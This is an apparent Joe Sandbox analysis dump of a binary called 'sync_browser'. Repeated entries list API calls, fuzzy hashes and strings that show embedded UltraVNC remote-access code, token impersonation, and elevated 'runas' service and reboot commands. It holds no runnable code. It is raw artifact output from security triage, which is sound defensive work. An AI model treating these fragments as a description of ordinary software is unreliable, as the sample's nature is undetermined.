                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                          • String ID: SHGetSettings$shell32.dll
                                                                                          • API String ID: 145871493-1819508790
                                                                                          • Opcode ID: 77214687e6c2f938150f522afdd75d8ba5a5dca8d0fd701ab14ac9b329bd435a
                                                                                          • Instruction ID: 44d166203d7eccadf63ba809a708865927b49c15f89adf4937475577093d0d31
                                                                                          • Opcode Fuzzy Hash: 77214687e6c2f938150f522afdd75d8ba5a5dca8d0fd701ab14ac9b329bd435a
                                                                                          • Instruction Fuzzy Hash: C2119122F2D74182FE508B69F484179A3A8EFA8B81F481535FA1F837A5DF2CE549C300
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Event$ObjectResetSingleWait$CriticalEnterSection
                                                                                          • String ID:
                                                                                          • API String ID: 3343876880-0
                                                                                          • Opcode ID: d3057a2b6849e393004495c8da3765230f28397fe0c1293d29a74e0cbff77646
                                                                                          • Instruction ID: faec473cfd70d620fe3ead6bb4d0b132414ef3a839d1252e4073f3a5984574c3
                                                                                          • Opcode Fuzzy Hash: d3057a2b6849e393004495c8da3765230f28397fe0c1293d29a74e0cbff77646
                                                                                          • Instruction Fuzzy Hash: 75212477A28B8193EB589F26D6842ADA364FB95B95F105031EB1E87650CF3CE4B9C700
                                                                                          APIs
                                                                                          Strings
                                                                                          • vncclient.cpp : %%%%%%%%%%%%% vncClient::UNDoFTUserImpersonation - 1, xrefs: 00007FF67E7EC515
                                                                                          • vncclient.cpp : %%%%%%%%%%%%% vncClient::UNDoFTUserImpersonation - Impersonationtoken exists, xrefs: 00007FF67E7EC557
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$EnterLeaveRevertSelfTimetime
                                                                                          • String ID: vncclient.cpp : %%%%%%%%%%%%% vncClient::UNDoFTUserImpersonation - 1$vncclient.cpp : %%%%%%%%%%%%% vncClient::UNDoFTUserImpersonation - Impersonationtoken exists
                                                                                          • API String ID: 4293870407-1873781047
                                                                                          • Opcode ID: be91d13ce7b9590cac12ce48197b4f720c3c90b62c69517ca8b832bb9a46fa5f
                                                                                          • Instruction ID: c888ac44db82c69384b5d4481284fb8c4b1904e8c823d00ad08ae1687a6d0b4b
                                                                                          • Opcode Fuzzy Hash: be91d13ce7b9590cac12ce48197b4f720c3c90b62c69517ca8b832bb9a46fa5f
                                                                                          • Instruction Fuzzy Hash: 18117057E289C255FB548B74D5483BD6792EF68788F180035E64D8A291CF2CA09DC340
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                                                          • String ID: -rebootforce$p$runas
                                                                                          • API String ID: 3648085421-45594291
                                                                                          • Opcode ID: c9e64b892c4310a2a8aa35deb39eabc56664ec1848822a0344db8a204f455f45
                                                                                          • Instruction ID: f8b88b9be362a1fa56dd456b385c1d878428b1680384eadc2f84780962fe8b56
                                                                                          • Opcode Fuzzy Hash: c9e64b892c4310a2a8aa35deb39eabc56664ec1848822a0344db8a204f455f45
                                                                                          • Instruction Fuzzy Hash: AF01DA32A29B8185E7219F54F49439BB3A4FB99344F80023AEACD42B68DF7CD158CB00
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                                                          • String ID: -rebootsafemode$p$runas
                                                                                          • API String ID: 3648085421-4291177908
                                                                                          • Opcode ID: ebe23701378919e1af33a6bf656780ce82059cac4ad0fb8edc734de712cd212d
                                                                                          • Instruction ID: 5ecc848a235272f49df1c25cdc9562598a4c2baee6d89ade59f5121c4beaa217
                                                                                          • Opcode Fuzzy Hash: ebe23701378919e1af33a6bf656780ce82059cac4ad0fb8edc734de712cd212d
                                                                                          • Instruction Fuzzy Hash: 0901DA32A29B8185E7219F54F49439BB3A4FB99344F80023AEACD42B68DF7CD158CB00
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                                                          • String ID: -stopservice$p$runas
                                                                                          • API String ID: 3648085421-4230321595
                                                                                          • Opcode ID: 7801f256456fabef1ba334d8cfc515ba8b90833b9c41cec9be355c3b8ea1ded8
                                                                                          • Instruction ID: 993c52960acf2065fd0b94cdbbe849e8772cd0c65258237b35f2ddc0a1759353
                                                                                          • Opcode Fuzzy Hash: 7801f256456fabef1ba334d8cfc515ba8b90833b9c41cec9be355c3b8ea1ded8
                                                                                          • Instruction Fuzzy Hash: 0B01EC36A28F81C5E7609F10F49439AB3A4FB99744F800235E6CD42BA8DF7DD158CB40
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                                                          • String ID: -securityeditor$p$runas
                                                                                          • API String ID: 3648085421-1380712588
                                                                                          • Opcode ID: 6428cee7919a180ae7089cf50127ee33227a6254b4296794cfa51c588de506a2
                                                                                          • Instruction ID: db1aa76e2487bd8050bd6e45ac65b61d85553d090f6a527d298f099124fd75b4
                                                                                          • Opcode Fuzzy Hash: 6428cee7919a180ae7089cf50127ee33227a6254b4296794cfa51c588de506a2
                                                                                          • Instruction Fuzzy Hash: D001EC36A29B8185E7609F10F49439AB3A4FB99744F800235E6CD42B68DF7DD158CB40
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                                                          • String ID: -startservice$p$runas
                                                                                          • API String ID: 3648085421-278061118
                                                                                          • Opcode ID: 926b2c35945988a05c881ee216fe9ef46aea1621d10afb6dfb6c9793bb67f9ef
                                                                                          • Instruction ID: da79334f3b62452a7b0e00ae569920b3c01796fac247737d8980de82e617572e
                                                                                          • Opcode Fuzzy Hash: 926b2c35945988a05c881ee216fe9ef46aea1621d10afb6dfb6c9793bb67f9ef
                                                                                          • Instruction Fuzzy Hash: 1E01EC36A28B8185E7609F10F49439AB3A4FB99744F800235E6CD42B68DF7DD158CB40
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: %s:%s$Enter proxy authentication password for %s@%s: $Proxy-Authorization: Basic %s
                                                                                          • API String ID: 0-3750121419
                                                                                          • Opcode ID: dcac41199ae3c8df7bcab697df2315285d75f018ff24bfe801cf74db9f7aaf51
                                                                                          • Instruction ID: d252530a3b37f3f4ef31fa51924e25b335b194df3671781af98c9de9ea60cc2f
                                                                                          • Opcode Fuzzy Hash: dcac41199ae3c8df7bcab697df2315285d75f018ff24bfe801cf74db9f7aaf51
                                                                                          • Instruction Fuzzy Hash: 0131E463B2568144EA10DB76A8401A9A794EB59BF4F541735FE3D87BE5EE3CD089C300
                                                                                          APIs
                                                                                          • malloc.LIBCMT ref: 00007FF67E7DFFFD
                                                                                            • Part of subcall function 00007FF67E878C34: _FF_MSGBANNER.LIBCMT ref: 00007FF67E878C64
                                                                                            • Part of subcall function 00007FF67E878C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF67E88329C,?,?,?,00007FF67E887749,?,?,?,00007FF67E8877F3), ref: 00007FF67E878C89
                                                                                            • Part of subcall function 00007FF67E878C34: _callnewh.LIBCMT ref: 00007FF67E878CA2
                                                                                            • Part of subcall function 00007FF67E878C34: _errno.LIBCMT ref: 00007FF67E878CAD
                                                                                            • Part of subcall function 00007FF67E878C34: _errno.LIBCMT ref: 00007FF67E878CB8
                                                                                          • free.LIBCMT ref: 00007FF67E7E0097
                                                                                            • Part of subcall function 00007FF67E878BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF67E87748C), ref: 00007FF67E878C0A
                                                                                            • Part of subcall function 00007FF67E878BF4: _errno.LIBCMT ref: 00007FF67E878C14
                                                                                            • Part of subcall function 00007FF67E878BF4: GetLastError.KERNEL32(?,?,?,00007FF67E87748C), ref: 00007FF67E878C1C
                                                                                          • free.LIBCMT ref: 00007FF67E7E00BF
                                                                                          Strings
                                                                                          • vncclient.cpp : no password specified for server - client rejected, xrefs: 00007FF67E7E0053
                                                                                          • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called, xrefs: 00007FF67E7DFFE0
                                                                                          • This server does not have a valid password enabled. Until a password is set, incoming connections cannot be accepted., xrefs: 00007FF67E7E0068
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _errno$Heapfree$AllocErrorFreeLast_callnewhmalloc
                                                                                          • String ID: This server does not have a valid password enabled. Until a password is set, incoming connections cannot be accepted.$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called$vncclient.cpp : no password specified for server - client rejected
                                                                                          • API String ID: 1063416079-3080451256
                                                                                          • Opcode ID: 7436aef3344165f661bf3289f4a794c91dc4c24a9d76a1fefccbb8194f0ba96d
                                                                                          • Instruction ID: fce61c98137ab913b475ab2f68f6b2729836fd4deb2af358fb525aa9dbf438b5
                                                                                          • Opcode Fuzzy Hash: 7436aef3344165f661bf3289f4a794c91dc4c24a9d76a1fefccbb8194f0ba96d
                                                                                          • Instruction Fuzzy Hash: F031A422728A8141EA40DB65E8542FAA361EF94BB4F585332F97EC76E5DE2CD449C300
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$Leave$EnterErrorExceptionLastObjectRaiseSingleValueWait
                                                                                          • String ID:
                                                                                          • API String ID: 824239979-0
                                                                                          • Opcode ID: 12bf6ecd7088038fd47cecf56f3922a6986b1dec9d24cf819874f6182f192e8f
                                                                                          • Instruction ID: 0f1720fae54da996fa996fc7b36dc7ef745ba87c517e27588b19d0cf59382419
                                                                                          • Opcode Fuzzy Hash: 12bf6ecd7088038fd47cecf56f3922a6986b1dec9d24cf819874f6182f192e8f
                                                                                          • Instruction Fuzzy Hash: B2218133A38A4282EB428F24E844179B3A0FBA5B84F445531FA4F876A9DF2CD94DC700
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseHandleToken$OpenProcess$CreateDuplicateFirstInformationProcess32SnapshotToolhelp32
                                                                                          • String ID:
                                                                                          • API String ID: 3355884492-0
                                                                                          • Opcode ID: 6104325d5a1b9d43be635a96be43e70745f11669b1d82cc91958b0e9663c2412
                                                                                          • Instruction ID: 1d747c2e7bfedf4a8e70a967068ffdb83453ee2e77ac3c7491d08f3e43febdfd
                                                                                          • Opcode Fuzzy Hash: 6104325d5a1b9d43be635a96be43e70745f11669b1d82cc91958b0e9663c2412
                                                                                          • Instruction Fuzzy Hash: 04217E3AF28A9242E720DB65F44432AA760BF99790F144135FA9D83B59DE7CD449C701
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF67E87FFD1,?,?,?,?,00007FF67E878C19,?,?,?,00007FF67E87748C), ref: 00007FF67E8837CE
                                                                                          • FlsGetValue.KERNEL32(?,?,?,00007FF67E87FFD1,?,?,?,?,00007FF67E878C19,?,?,?,00007FF67E87748C), ref: 00007FF67E8837DC
                                                                                          • SetLastError.KERNEL32(?,?,?,00007FF67E87FFD1,?,?,?,?,00007FF67E878C19,?,?,?,00007FF67E87748C), ref: 00007FF67E883834
